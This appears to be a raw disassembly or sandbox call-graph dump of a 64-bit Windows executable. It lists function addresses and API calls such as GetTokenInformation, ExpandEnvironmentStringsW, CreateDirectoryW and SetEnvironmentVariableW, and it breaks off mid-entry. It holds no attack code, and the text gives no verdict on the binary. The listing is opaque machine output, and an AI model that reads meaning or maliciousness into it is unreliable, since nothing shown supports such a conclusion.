7ff6f0be17b0 38 API calls 17344->17348 17346 7ff6f0be366d 17345->17346 17354 7ff6f0be36db 17345->17354 17349 7ff6f0be3f74 47 API calls 17346->17349 17362 7ff6f0be375d 17346->17362 17347->17361 17348->17361 17349->17361 17350->17346 17351 7ff6f0be36a0 17350->17351 17350->17361 17355 7ff6f0be4430 47 API calls 17351->17355 17351->17362 17353 7ff6f0be1fd0 38 API calls 17352->17353 17352->17362 17353->17361 17354->17342 17356 7ff6f0be36e0 17354->17356 17355->17361 17358 7ff6f0be45c8 37 API calls 17356->17358 17356->17362 17357 7ff6f0bdc5c0 _log10_special 8 API calls 17359 7ff6f0be39f3 17357->17359 17358->17361 17359->17301 17360 7ff6f0bee8c8 47 API calls 17360->17361 17361->17360 17361->17362 17362->17357 17414 7ff6f0be0d84 17363->17414 17367 7ff6f0be3f96 17366->17367 17368 7ff6f0be0bf0 12 API calls 17367->17368 17369 7ff6f0be3fde 17368->17369 17370 7ff6f0bee5e0 46 API calls 17369->17370 17371 7ff6f0be40b1 17370->17371 17372 7ff6f0be4830 45 API calls 17371->17372 17374 7ff6f0be40d3 17371->17374 17372->17374 17373 7ff6f0be4830 45 API calls 17375 7ff6f0be415c 17373->17375 17374->17373 17374->17374 17374->17375 17375->17331 17377 7ff6f0be44b0 17376->17377 17378 7ff6f0be4448 17376->17378 17377->17331 17378->17377 17379 7ff6f0bee8c8 47 API calls 17378->17379 17379->17377 17381 7ff6f0be1bf3 17380->17381 17382 7ff6f0be1c22 17381->17382 17384 7ff6f0be1cdf 17381->17384 17383 7ff6f0be0bf0 12 API calls 17382->17383 17386 7ff6f0be1c5f 17382->17386 17383->17386 17385 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 17384->17385 17385->17386 17386->17331 17388 7ff6f0be17e3 17387->17388 17389 7ff6f0be1812 17388->17389 17391 7ff6f0be18cf 17388->17391 17390 7ff6f0be0bf0 12 API calls 17389->17390 17393 7ff6f0be184f 17389->17393 17390->17393 17392 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 17391->17392 17392->17393 17393->17331 17395 7ff6f0be2003 17394->17395 17396 7ff6f0be2032 17395->17396 17398 7ff6f0be20ef 17395->17398 17397 7ff6f0be0bf0 12 API calls 17396->17397 17400 7ff6f0be206f 17396->17400 17397->17400 17399 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 17398->17399 17399->17400 17400->17331 17402 7ff6f0bee8f0 17401->17402 17403 7ff6f0bee935 17402->17403 17405 7ff6f0be4830 45 API calls 17402->17405 17407 7ff6f0bee8f5 __scrt_get_show_window_mode 17402->17407 17410 7ff6f0bee91e __scrt_get_show_window_mode 17402->17410 17403->17407 17403->17410 17411 7ff6f0bf0858 17403->17411 17404 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 17404->17407 17405->17403 17407->17331 17410->17404 17410->17407 17412 7ff6f0bf087c WideCharToMultiByte 17411->17412 17415 7ff6f0be0dc3 17414->17415 17416 7ff6f0be0db1 17414->17416 17419 7ff6f0be0dd0 17415->17419 17422 7ff6f0be0e0d 17415->17422 17417 7ff6f0be4f78 _get_daylight 11 API calls 17416->17417 17418 7ff6f0be0db6 17417->17418 17420 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 17418->17420 17421 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 17419->17421 17428 7ff6f0be0dc1 17420->17428 17421->17428 17423 7ff6f0be0eb6 17422->17423 17424 7ff6f0be4f78 _get_daylight 11 API calls 17422->17424 17425 7ff6f0be4f78 _get_daylight 11 API calls 17423->17425 17423->17428 17426 7ff6f0be0eab 17424->17426 17427 7ff6f0be0f60 17425->17427 17429 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 17426->17429 17430 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 17427->17430 17428->17301 17429->17423 17430->17428 17434 7ff6f0beecad 17431->17434 17432 7ff6f0beecb2 17433 7ff6f0be4f78 _get_daylight 11 API calls 17432->17433 17437 7ff6f0be524d 17432->17437 17439 7ff6f0beecbc 17433->17439 17434->17432 17435 7ff6f0beecfc 17434->17435 17434->17437 17435->17437 17438 7ff6f0be4f78 _get_daylight 11 API calls 17435->17438 17436 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 17436->17437 17437->17281 17437->17282 17438->17439 17439->17436 17441 7ff6f0be82b5 17440->17441 17442 7ff6f0be82c8 17440->17442 17443 7ff6f0be4f78 _get_daylight 11 API calls 17441->17443 17450 7ff6f0be7f2c 17442->17450 17445 7ff6f0be82ba 17443->17445 17447 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 17445->17447 17448 7ff6f0be82c6 17447->17448 17448->16574 17457 7ff6f0bf0348 EnterCriticalSection 17450->17457 17459 7ff6f0bd87a1 GetTokenInformation 17458->17459 17460 7ff6f0bd8823 __vcrt_freefls 17458->17460 17461 7ff6f0bd87c2 GetLastError 17459->17461 17462 7ff6f0bd87cd 17459->17462 17463 7ff6f0bd883c 17460->17463 17464 7ff6f0bd8836 CloseHandle 17460->17464 17461->17460 17461->17462 17462->17460 17465 7ff6f0bd87e9 GetTokenInformation 17462->17465 17463->16579 17464->17463 17465->17460 17466 7ff6f0bd880c 17465->17466 17466->17460 17467 7ff6f0bd8816 ConvertSidToStringSidW 17466->17467 17467->17460 17469 7ff6f0bdc8c0 17468->17469 17470 7ff6f0bd2b74 GetCurrentProcessId 17469->17470 17471 7ff6f0bd26b0 48 API calls 17470->17471 17472 7ff6f0bd2bc7 17471->17472 17473 7ff6f0be4c48 48 API calls 17472->17473 17474 7ff6f0bd2c10 MessageBoxW 17473->17474 17475 7ff6f0bdc5c0 _log10_special 8 API calls 17474->17475 17476 7ff6f0bd2c40 17475->17476 17476->16589 17478 7ff6f0bd25e5 17477->17478 17479 7ff6f0be4c48 48 API calls 17478->17479 17480 7ff6f0bd2604 17479->17480 17480->16605 17516 7ff6f0be8804 17481->17516 17485 7ff6f0bd81cc 17484->17485 17486 7ff6f0bd9400 2 API calls 17485->17486 17487 7ff6f0bd81eb 17486->17487 17488 7ff6f0bd81f3 17487->17488 17489 7ff6f0bd8206 ExpandEnvironmentStringsW 17487->17489 17490 7ff6f0bd2810 49 API calls 17488->17490 17491 7ff6f0bd822c __vcrt_freefls 17489->17491 17492 7ff6f0bd81ff __vcrt_freefls 17490->17492 17493 7ff6f0bd8243 17491->17493 17494 7ff6f0bd8230 17491->17494 17496 7ff6f0bdc5c0 _log10_special 8 API calls 17492->17496 17498 7ff6f0bd82af 17493->17498 17501 7ff6f0bd8251 GetDriveTypeW 17493->17501 17495 7ff6f0bd2810 49 API calls 17494->17495 17495->17492 17497 7ff6f0bd839f 17496->17497 17654 7ff6f0be7e78 17498->17654 17503 7ff6f0bd8285 17501->17503 17504 7ff6f0bd82a0 17501->17504 17557 7ff6f0bf15c8 17516->17557 17616 7ff6f0bf1340 17557->17616 17637 7ff6f0bf0348 EnterCriticalSection 17616->17637 17756 7ff6f0bd455a 17755->17756 17757 7ff6f0bd9400 2 API calls 17756->17757 17758 7ff6f0bd457f 17757->17758 17759 7ff6f0bdc5c0 _log10_special 8 API calls 17758->17759 17760 7ff6f0bd45a7 17759->17760 17760->16641 17762 7ff6f0bd7e1e 17761->17762 17763 7ff6f0bd7f42 17762->17763 17764 7ff6f0bd1c80 49 API calls 17762->17764 17765 7ff6f0bdc5c0 _log10_special 8 API calls 17763->17765 17768 7ff6f0bd7ea5 17764->17768 17766 7ff6f0bd7f73 17765->17766 17766->16641 17767 7ff6f0bd1c80 49 API calls 17767->17768 17768->17763 17768->17767 17769 7ff6f0bd4550 10 API calls 17768->17769 17770 7ff6f0bd7efb 17768->17770 17769->17768 17771 7ff6f0bd9400 2 API calls 17770->17771 17772 7ff6f0bd7f13 CreateDirectoryW 17771->17772 17772->17763 17772->17768 17774 7ff6f0bd1613 17773->17774 17775 7ff6f0bd1637 17773->17775 17896 7ff6f0bd1050 17774->17896 17777 7ff6f0bd45b0 108 API calls 17775->17777 17779 7ff6f0bd164b 17777->17779 17778 7ff6f0bd1618 17780 7ff6f0bd162e 17778->17780 17784 7ff6f0bd2710 54 API calls 17778->17784 17781 7ff6f0bd1682 17779->17781 17782 7ff6f0bd1653 17779->17782 17780->16641 17783 7ff6f0bd45b0 108 API calls 17781->17783 17785 7ff6f0be4f78 _get_daylight 11 API calls 17782->17785 17787 7ff6f0bd1696 17783->17787 17784->17780 17786 7ff6f0bd1658 17785->17786 17788 7ff6f0bd2910 54 API calls 17786->17788 17789 7ff6f0bd169e 17787->17789 17790 7ff6f0bd16b8 17787->17790 17791 7ff6f0bd1671 17788->17791 17792 7ff6f0bd2710 54 API calls 17789->17792 17793 7ff6f0be0744 73 API calls 17790->17793 17791->16641 17794 7ff6f0bd16ae 17792->17794 17795 7ff6f0bd16cd 17793->17795 17799 7ff6f0be00bc 74 API calls 17794->17799 17796 7ff6f0bd16d1 17795->17796 17797 7ff6f0bd16f9 17795->17797 17800 7ff6f0be4f78 _get_daylight 11 API calls 17796->17800 17798 7ff6f0bd16ff 17797->17798 17804 7ff6f0bd1717 17797->17804 17872 7ff6f0bd1210 17798->17872 17802 7ff6f0bd1829 17799->17802 17803 7ff6f0bd16d6 17800->17803 17802->16641 17822 7ff6f0bd717b 17821->17822 17824 7ff6f0bd7134 17821->17824 17822->16641 17824->17822 17964 7ff6f0be5094 17824->17964 17826 7ff6f0bd4191 17825->17826 17827 7ff6f0bd44d0 49 API calls 17826->17827 17828 7ff6f0bd41cb 17827->17828 17829 7ff6f0bd44d0 49 API calls 17828->17829 17830 7ff6f0bd41db 17829->17830 17831 7ff6f0bd422c 17830->17831 17832 7ff6f0bd41fd 17830->17832 17834 7ff6f0bd4100 51 API calls 17831->17834 17995 7ff6f0bd4100 17832->17995 17835 7ff6f0bd422a 17834->17835 17836 7ff6f0bd428c 17835->17836 17837 7ff6f0bd4257 17835->17837 17838 7ff6f0bd4100 51 API calls 17836->17838 18002 7ff6f0bd7ce0 17837->18002 17841 7ff6f0bd42b0 17838->17841 17870 7ff6f0bd1c80 49 API calls 17869->17870 17871 7ff6f0bd4464 17870->17871 17871->16641 17897 7ff6f0bd45b0 108 API calls 17896->17897 17898 7ff6f0bd108c 17897->17898 17899 7ff6f0bd1094 17898->17899 17900 7ff6f0bd10a9 17898->17900 17901 7ff6f0bd2710 54 API calls 17899->17901 17902 7ff6f0be0744 73 API calls 17900->17902 17908 7ff6f0bd10a4 __vcrt_freefls 17901->17908 17903 7ff6f0bd10bf 17902->17903 17904 7ff6f0bd10c3 17903->17904 17905 7ff6f0bd10e6 17903->17905 17906 7ff6f0be4f78 _get_daylight 11 API calls 17904->17906 17909 7ff6f0bd1122 17905->17909 17910 7ff6f0bd10f7 17905->17910 17907 7ff6f0bd10c8 17906->17907 17911 7ff6f0bd2910 54 API calls 17907->17911 17908->17778 17913 7ff6f0bd1129 17909->17913 17918 7ff6f0bd113c 17909->17918 17912 7ff6f0be4f78 _get_daylight 11 API calls 17910->17912 17919 7ff6f0bd10e1 __vcrt_freefls 17911->17919 17914 7ff6f0bd1100 17912->17914 17915 7ff6f0bd1210 92 API calls 17913->17915 17915->17919 17918->17919 17921 7ff6f0be040c _fread_nolock 53 API calls 17918->17921 17923 7ff6f0bd11ed 17918->17923 17921->17918 17924 7ff6f0be4f78 _get_daylight 11 API calls 17923->17924 17965 7ff6f0be50ce 17964->17965 17966 7ff6f0be50a1 17964->17966 17968 7ff6f0be50f1 17965->17968 17969 7ff6f0be510d 17965->17969 17967 7ff6f0be4f78 _get_daylight 11 API calls 17966->17967 17975 7ff6f0be5058 17966->17975 17970 7ff6f0be50ab 17967->17970 17971 7ff6f0be4f78 _get_daylight 11 API calls 17968->17971 17979 7ff6f0be4fbc 17969->17979 17974 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 17970->17974 17972 7ff6f0be50f6 17971->17972 17976 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 17972->17976 17978 7ff6f0be50b6 17974->17978 17975->17824 17977 7ff6f0be5101 17976->17977 17977->17824 17978->17824 17980 7ff6f0be4fe0 17979->17980 17986 7ff6f0be4fdb 17979->17986 17981 7ff6f0beb1c0 __CxxCallCatchBlock 45 API calls 17980->17981 17980->17986 17982 7ff6f0be4ffb 17981->17982 17987 7ff6f0bed9f4 17982->17987 17986->17977 17988 7ff6f0be501e 17987->17988 17989 7ff6f0beda09 17987->17989 17991 7ff6f0beda60 17988->17991 17989->17988 17990 7ff6f0bf3374 45 API calls 17989->17990 17990->17988 17992 7ff6f0beda75 17991->17992 17993 7ff6f0beda88 17991->17993 17992->17993 17993->17986 17996 7ff6f0bd4126 17995->17996 17997 7ff6f0be49f4 49 API calls 17996->17997 17998 7ff6f0bd414c 17997->17998 17999 7ff6f0bd415d 17998->17999 18000 7ff6f0bd4550 10 API calls 17998->18000 17999->17835 18003 7ff6f0bd7cf5 18002->18003 18059 7ff6f0be5f38 18058->18059 18060 7ff6f0be5f5e 18059->18060 18063 7ff6f0be5f91 18059->18063 18061 7ff6f0be4f78 _get_daylight 11 API calls 18060->18061 18062 7ff6f0be5f63 18061->18062 18064 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 18062->18064 18065 7ff6f0be5fa4 18063->18065 18066 7ff6f0be5f97 18063->18066 18070 7ff6f0bd4606 18064->18070 18077 7ff6f0beac98 18065->18077 18067 7ff6f0be4f78 _get_daylight 11 API calls 18066->18067 18067->18070 18070->16667 18090 7ff6f0bf0348 EnterCriticalSection 18077->18090 18450 7ff6f0be7968 18449->18450 18453 7ff6f0be7444 18450->18453 18452 7ff6f0be7981 18452->16677 18454 7ff6f0be745f 18453->18454 18455 7ff6f0be748e 18453->18455 18457 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 18454->18457 18463 7ff6f0be54dc EnterCriticalSection 18455->18463 18459 7ff6f0be747f 18457->18459 18459->18452 18465 7ff6f0bdfeb3 18464->18465 18466 7ff6f0bdfee1 18464->18466 18467 7ff6f0bea884 _invalid_parameter_noinfo 37 API calls 18465->18467 18469 7ff6f0bdfed3 18466->18469 18474 7ff6f0be54dc EnterCriticalSection 18466->18474 18467->18469 18469->16681 18476 7ff6f0bd45b0 108 API calls 18475->18476 18477 7ff6f0bd1493 18476->18477 18478 7ff6f0bd149b 18477->18478 18479 7ff6f0bd14bc 18477->18479 18480 7ff6f0bd2710 54 API calls 18478->18480 18481 7ff6f0be0744 73 API calls 18479->18481 18482 7ff6f0bd14ab 18480->18482 18483 7ff6f0bd14d1 18481->18483 18482->16707 18484 7ff6f0bd14d5 18483->18484 18485 7ff6f0bd14f8 18483->18485 18486 7ff6f0be4f78 _get_daylight 11 API calls 18484->18486 18488 7ff6f0bd1532 18485->18488 18489 7ff6f0bd1508 18485->18489 18582 7ff6f0bd6365 18581->18582 18583 7ff6f0bd1c80 49 API calls 18582->18583 18584 7ff6f0bd63a1 18583->18584 18585 7ff6f0bd63aa 18584->18585 18586 7ff6f0bd63cd 18584->18586 18587 7ff6f0bd2710 54 API calls 18585->18587 18588 7ff6f0bd4620 49 API calls 18586->18588 18611 7ff6f0bd63c3 18587->18611 18589 7ff6f0bd63e5 18588->18589 18590 7ff6f0bd6403 18589->18590 18592 7ff6f0bd2710 54 API calls 18589->18592 18593 7ff6f0bd4550 10 API calls 18590->18593 18591 7ff6f0bdc5c0 _log10_special 8 API calls 18594 7ff6f0bd336e 18591->18594 18592->18590 18595 7ff6f0bd640d 18593->18595 18594->16781 18612 7ff6f0bd64f0 18594->18612 18596 7ff6f0bd641b 18595->18596 18597 7ff6f0bd9070 3 API calls 18595->18597 18598 7ff6f0bd4620 49 API calls 18596->18598 18597->18596 18611->18591 18761 7ff6f0bd53f0 18612->18761 18763 7ff6f0bd541c 18761->18763 18762 7ff6f0bd5424 18763->18762 18766 7ff6f0bd55c4 18763->18766 18792 7ff6f0be6b14 18763->18792 19747 7ff6f0be9dc0 19750 7ff6f0be9d3c 19747->19750 19757 7ff6f0bf0348 EnterCriticalSection 19750->19757 20707 7ff6f0beb040 20708 7ff6f0beb045 20707->20708 20709 7ff6f0beb05a 20707->20709 20713 7ff6f0beb060 20708->20713 20714 7ff6f0beb0a2 20713->20714 20718 7ff6f0beb0aa 20713->20718 20716 7ff6f0bea9b8 __free_lconv_num 11 API calls 20714->20716 20715 7ff6f0bea9b8 __free_lconv_num 11 API calls 20717 7ff6f0beb0b7 20715->20717 20716->20718 20719 7ff6f0bea9b8 __free_lconv_num 11 API calls 20717->20719 20718->20715 20720 7ff6f0beb0c4 20719->20720 20721 7ff6f0bea9b8 __free_lconv_num 11 API calls 20720->20721 20722 7ff6f0beb0d1 20721->20722 20723 7ff6f0bea9b8 __free_lconv_num 11 API calls 20722->20723 20724 7ff6f0beb0de 20723->20724 20725 7ff6f0bea9b8 __free_lconv_num 11 API calls 20724->20725 20726 7ff6f0beb0eb 20725->20726 20727 7ff6f0bea9b8 __free_lconv_num 11 API calls 20726->20727 20728 7ff6f0beb0f8 20727->20728 20729 7ff6f0bea9b8 __free_lconv_num 11 API calls 20728->20729 20730 7ff6f0beb105 20729->20730 20731 7ff6f0bea9b8 __free_lconv_num 11 API calls 20730->20731 20732 7ff6f0beb115 20731->20732 20733 7ff6f0bea9b8 __free_lconv_num 11 API calls 20732->20733 20734 7ff6f0beb125 20733->20734 20739 7ff6f0beaf04 20734->20739 20753 7ff6f0bf0348 EnterCriticalSection 20739->20753 19761 7ff6f0bdcbc0 19762 7ff6f0bdcbd0 19761->19762 19778 7ff6f0be9c18 19762->19778 19764 7ff6f0bdcbdc 19784 7ff6f0bdceb8 19764->19784 19766 7ff6f0bdd19c 7 API calls 19769 7ff6f0bdcc75 19766->19769 19767 7ff6f0bdcbf4 _RTC_Initialize 19776 7ff6f0bdcc49 19767->19776 19789 7ff6f0bdd068 19767->19789 19770 7ff6f0bdcc09 19792 7ff6f0be9084 19770->19792 19776->19766 19777 7ff6f0bdcc65 19776->19777 19779 7ff6f0be9c29 19778->19779 19780 7ff6f0be4f78 _get_daylight 11 API calls 19779->19780 19781 7ff6f0be9c31 19779->19781 19782 7ff6f0be9c40 19780->19782 19781->19764 19783 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19782->19783 19783->19781 19785 7ff6f0bdcece __scrt_acquire_startup_lock 19784->19785 19786 7ff6f0bdcec9 19784->19786 19785->19767 19786->19785 19787 7ff6f0bdd19c 7 API calls 19786->19787 19788 7ff6f0bdcf42 19787->19788 19817 7ff6f0bdd02c 19789->19817 19791 7ff6f0bdd071 19791->19770 19793 7ff6f0be90a4 19792->19793 19815 7ff6f0bdcc15 19792->19815 19794 7ff6f0be90c2 GetModuleFileNameW 19793->19794 19795 7ff6f0be90ac 19793->19795 19799 7ff6f0be90ed 19794->19799 19796 7ff6f0be4f78 _get_daylight 11 API calls 19795->19796 19797 7ff6f0be90b1 19796->19797 19798 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19797->19798 19798->19815 19832 7ff6f0be9024 19799->19832 19802 7ff6f0be9135 19804 7ff6f0be4f78 _get_daylight 11 API calls 19802->19804 19803 7ff6f0be914d 19807 7ff6f0be916f 19803->19807 19809 7ff6f0be91b4 19803->19809 19810 7ff6f0be919b 19803->19810 19805 7ff6f0be913a 19804->19805 19806 7ff6f0bea9b8 __free_lconv_num 11 API calls 19805->19806 19806->19815 19808 7ff6f0bea9b8 __free_lconv_num 11 API calls 19807->19808 19808->19815 19813 7ff6f0bea9b8 __free_lconv_num 11 API calls 19809->19813 19811 7ff6f0bea9b8 __free_lconv_num 11 API calls 19810->19811 19812 7ff6f0be91a4 19811->19812 19814 7ff6f0bea9b8 __free_lconv_num 11 API calls 19812->19814 19813->19807 19814->19815 19815->19776 19816 7ff6f0bdd13c InitializeSListHead 19815->19816 19818 7ff6f0bdd03f 19817->19818 19819 7ff6f0bdd046 19817->19819 19818->19791 19821 7ff6f0bea25c 19819->19821 19824 7ff6f0be9e98 19821->19824 19831 7ff6f0bf0348 EnterCriticalSection 19824->19831 19833 7ff6f0be903c 19832->19833 19834 7ff6f0be9074 19832->19834 19833->19834 19835 7ff6f0beec08 _get_daylight 11 API calls 19833->19835 19834->19802 19834->19803 19836 7ff6f0be906a 19835->19836 19837 7ff6f0bea9b8 __free_lconv_num 11 API calls 19836->19837 19837->19834 18870 7ff6f0bf0938 18871 7ff6f0bf095c 18870->18871 18873 7ff6f0bf096c 18870->18873 18872 7ff6f0be4f78 _get_daylight 11 API calls 18871->18872 18895 7ff6f0bf0961 18872->18895 18874 7ff6f0bf0c4c 18873->18874 18876 7ff6f0bf098e 18873->18876 18875 7ff6f0be4f78 _get_daylight 11 API calls 18874->18875 18877 7ff6f0bf0c51 18875->18877 18878 7ff6f0bf09af 18876->18878 19001 7ff6f0bf0ff4 18876->19001 18879 7ff6f0bea9b8 __free_lconv_num 11 API calls 18877->18879 18881 7ff6f0bf0a21 18878->18881 18883 7ff6f0bf09d5 18878->18883 18887 7ff6f0bf0a15 18878->18887 18879->18895 18885 7ff6f0beec08 _get_daylight 11 API calls 18881->18885 18900 7ff6f0bf09e4 18881->18900 18882 7ff6f0bf0ace 18894 7ff6f0bf0aeb 18882->18894 18901 7ff6f0bf0b3d 18882->18901 19016 7ff6f0be9730 18883->19016 18888 7ff6f0bf0a37 18885->18888 18887->18882 18887->18900 19022 7ff6f0bf719c 18887->19022 18891 7ff6f0bea9b8 __free_lconv_num 11 API calls 18888->18891 18890 7ff6f0bea9b8 __free_lconv_num 11 API calls 18890->18895 18896 7ff6f0bf0a45 18891->18896 18892 7ff6f0bf09df 18897 7ff6f0be4f78 _get_daylight 11 API calls 18892->18897 18893 7ff6f0bf09fd 18893->18887 18899 7ff6f0bf0ff4 45 API calls 18893->18899 18898 7ff6f0bea9b8 __free_lconv_num 11 API calls 18894->18898 18896->18887 18896->18900 18904 7ff6f0beec08 _get_daylight 11 API calls 18896->18904 18897->18900 18902 7ff6f0bf0af4 18898->18902 18899->18887 18900->18890 18901->18900 18903 7ff6f0bf344c 40 API calls 18901->18903 18911 7ff6f0bf0af9 18902->18911 19058 7ff6f0bf344c 18902->19058 18905 7ff6f0bf0b7a 18903->18905 18907 7ff6f0bf0a67 18904->18907 18908 7ff6f0bea9b8 __free_lconv_num 11 API calls 18905->18908 18913 7ff6f0bea9b8 __free_lconv_num 11 API calls 18907->18913 18909 7ff6f0bf0b84 18908->18909 18909->18900 18909->18911 18910 7ff6f0bf0c40 18915 7ff6f0bea9b8 __free_lconv_num 11 API calls 18910->18915 18911->18910 18916 7ff6f0beec08 _get_daylight 11 API calls 18911->18916 18912 7ff6f0bf0b25 18914 7ff6f0bea9b8 __free_lconv_num 11 API calls 18912->18914 18913->18887 18914->18911 18915->18895 18917 7ff6f0bf0bc8 18916->18917 18918 7ff6f0bf0bd0 18917->18918 18919 7ff6f0bf0bd9 18917->18919 18920 7ff6f0bea9b8 __free_lconv_num 11 API calls 18918->18920 18921 7ff6f0bea514 __std_exception_copy 37 API calls 18919->18921 18942 7ff6f0bf0bd7 18920->18942 18922 7ff6f0bf0be8 18921->18922 18923 7ff6f0bf0bf0 18922->18923 18924 7ff6f0bf0c7b 18922->18924 19067 7ff6f0bf72b4 18923->19067 18926 7ff6f0bea970 _isindst 17 API calls 18924->18926 18929 7ff6f0bf0c8f 18926->18929 18927 7ff6f0bea9b8 __free_lconv_num 11 API calls 18927->18895 18932 7ff6f0bf0cb8 18929->18932 18937 7ff6f0bf0cc8 18929->18937 18930 7ff6f0bf0c38 18935 7ff6f0bea9b8 __free_lconv_num 11 API calls 18930->18935 18931 7ff6f0bf0c17 18933 7ff6f0be4f78 _get_daylight 11 API calls 18931->18933 18934 7ff6f0be4f78 _get_daylight 11 API calls 18932->18934 18936 7ff6f0bf0c1c 18933->18936 18939 7ff6f0bf0cbd 18934->18939 18935->18910 18938 7ff6f0bea9b8 __free_lconv_num 11 API calls 18936->18938 18940 7ff6f0bf0fab 18937->18940 18943 7ff6f0bf0cea 18937->18943 18938->18942 18941 7ff6f0be4f78 _get_daylight 11 API calls 18940->18941 18945 7ff6f0bf0fb0 18941->18945 18942->18927 18944 7ff6f0bf0d07 18943->18944 19086 7ff6f0bf10dc 18943->19086 18948 7ff6f0bf0d7b 18944->18948 18950 7ff6f0bf0d2f 18944->18950 18954 7ff6f0bf0d6f 18944->18954 18947 7ff6f0bea9b8 __free_lconv_num 11 API calls 18945->18947 18947->18939 18952 7ff6f0bf0da3 18948->18952 18955 7ff6f0beec08 _get_daylight 11 API calls 18948->18955 18970 7ff6f0bf0d3e 18948->18970 18949 7ff6f0bf0e2e 18963 7ff6f0bf0e4b 18949->18963 18971 7ff6f0bf0e9e 18949->18971 19101 7ff6f0be976c 18950->19101 18952->18954 18957 7ff6f0beec08 _get_daylight 11 API calls 18952->18957 18952->18970 18954->18949 18954->18970 19107 7ff6f0bf705c 18954->19107 18959 7ff6f0bf0d95 18955->18959 18962 7ff6f0bf0dc5 18957->18962 18958 7ff6f0bea9b8 __free_lconv_num 11 API calls 18958->18939 18964 7ff6f0bea9b8 __free_lconv_num 11 API calls 18959->18964 18960 7ff6f0bf0d39 18965 7ff6f0be4f78 _get_daylight 11 API calls 18960->18965 18961 7ff6f0bf0d57 18961->18954 18969 7ff6f0bf10dc 45 API calls 18961->18969 18966 7ff6f0bea9b8 __free_lconv_num 11 API calls 18962->18966 18967 7ff6f0bea9b8 __free_lconv_num 11 API calls 18963->18967 18964->18952 18965->18970 18966->18954 18968 7ff6f0bf0e54 18967->18968 18975 7ff6f0bf344c 40 API calls 18968->18975 18978 7ff6f0bf0e5a 18968->18978 18969->18954 18970->18958 18971->18970 18972 7ff6f0bf344c 40 API calls 18971->18972 18973 7ff6f0bf0edc 18972->18973 18974 7ff6f0bea9b8 __free_lconv_num 11 API calls 18973->18974 18976 7ff6f0bf0ee6 18974->18976 18979 7ff6f0bf0e86 18975->18979 18976->18970 18976->18978 18977 7ff6f0bf0f9f 18981 7ff6f0bea9b8 __free_lconv_num 11 API calls 18977->18981 18978->18977 18982 7ff6f0beec08 _get_daylight 11 API calls 18978->18982 18980 7ff6f0bea9b8 __free_lconv_num 11 API calls 18979->18980 18980->18978 18981->18939 18983 7ff6f0bf0f2b 18982->18983 18984 7ff6f0bf0f33 18983->18984 18985 7ff6f0bf0f3c 18983->18985 18986 7ff6f0bea9b8 __free_lconv_num 11 API calls 18984->18986 18987 7ff6f0bf04e4 37 API calls 18985->18987 18989 7ff6f0bf0f3a 18986->18989 18988 7ff6f0bf0f4a 18987->18988 18990 7ff6f0bf0f52 SetEnvironmentVariableW 18988->18990 18991 7ff6f0bf0fdf 18988->18991 18995 7ff6f0bea9b8 __free_lconv_num 11 API calls 18989->18995 18992 7ff6f0bf0f76 18990->18992 18993 7ff6f0bf0f97 18990->18993 18994 7ff6f0bea970 _isindst 17 API calls 18991->18994 18996 7ff6f0be4f78 _get_daylight 11 API calls 18992->18996 18998 7ff6f0bea9b8 __free_lconv_num 11 API calls 18993->18998 18997 7ff6f0bf0ff3 18994->18997 18995->18939 18999 7ff6f0bf0f7b 18996->18999 18998->18977 19000 7ff6f0bea9b8 __free_lconv_num 11 API calls 18999->19000 19000->18989 19002 7ff6f0bf1029 19001->19002 19009 7ff6f0bf1011 19001->19009 19003 7ff6f0beec08 _get_daylight 11 API calls 19002->19003 19004 7ff6f0bf104d 19003->19004 19005 7ff6f0bf10ae 19004->19005 19010 7ff6f0beec08 _get_daylight 11 API calls 19004->19010 19011 7ff6f0bea9b8 __free_lconv_num 11 API calls 19004->19011 19012 7ff6f0bea514 __std_exception_copy 37 API calls 19004->19012 19013 7ff6f0bf10bd 19004->19013 19015 7ff6f0bf10d2 19004->19015 19007 7ff6f0bea9b8 __free_lconv_num 11 API calls 19005->19007 19006 7ff6f0bea574 __CxxCallCatchBlock 45 API calls 19008 7ff6f0bf10d8 19006->19008 19007->19009 19009->18878 19010->19004 19011->19004 19012->19004 19014 7ff6f0bea970 _isindst 17 API calls 19013->19014 19014->19015 19015->19006 19017 7ff6f0be9740 19016->19017 19018 7ff6f0be9749 19016->19018 19017->19018 19131 7ff6f0be9208 19017->19131 19018->18892 19018->18893 19023 7ff6f0bf62c4 19022->19023 19024 7ff6f0bf71a9 19022->19024 19025 7ff6f0bf62d1 19023->19025 19032 7ff6f0bf6307 19023->19032 19026 7ff6f0be4fbc 45 API calls 19024->19026 19029 7ff6f0be4f78 _get_daylight 11 API calls 19025->19029 19045 7ff6f0bf6278 19025->19045 19028 7ff6f0bf71dd 19026->19028 19027 7ff6f0bf6331 19030 7ff6f0be4f78 _get_daylight 11 API calls 19027->19030 19034 7ff6f0bf71f3 19028->19034 19038 7ff6f0bf720a 19028->19038 19054 7ff6f0bf71e2 19028->19054 19031 7ff6f0bf62db 19029->19031 19033 7ff6f0bf6336 19030->19033 19035 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19031->19035 19032->19027 19036 7ff6f0bf6356 19032->19036 19037 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19033->19037 19039 7ff6f0be4f78 _get_daylight 11 API calls 19034->19039 19040 7ff6f0bf62e6 19035->19040 19041 7ff6f0bf6341 19036->19041 19044 7ff6f0be4fbc 45 API calls 19036->19044 19037->19041 19042 7ff6f0bf7214 19038->19042 19043 7ff6f0bf7226 19038->19043 19046 7ff6f0bf71f8 19039->19046 19040->18887 19041->18887 19047 7ff6f0be4f78 _get_daylight 11 API calls 19042->19047 19048 7ff6f0bf724e 19043->19048 19049 7ff6f0bf7237 19043->19049 19044->19041 19045->18887 19050 7ff6f0bea950 _invalid_parameter_noinfo 37 API calls 19046->19050 19051 7ff6f0bf7219 19047->19051 19373 7ff6f0bf8fbc 19048->19373 19364 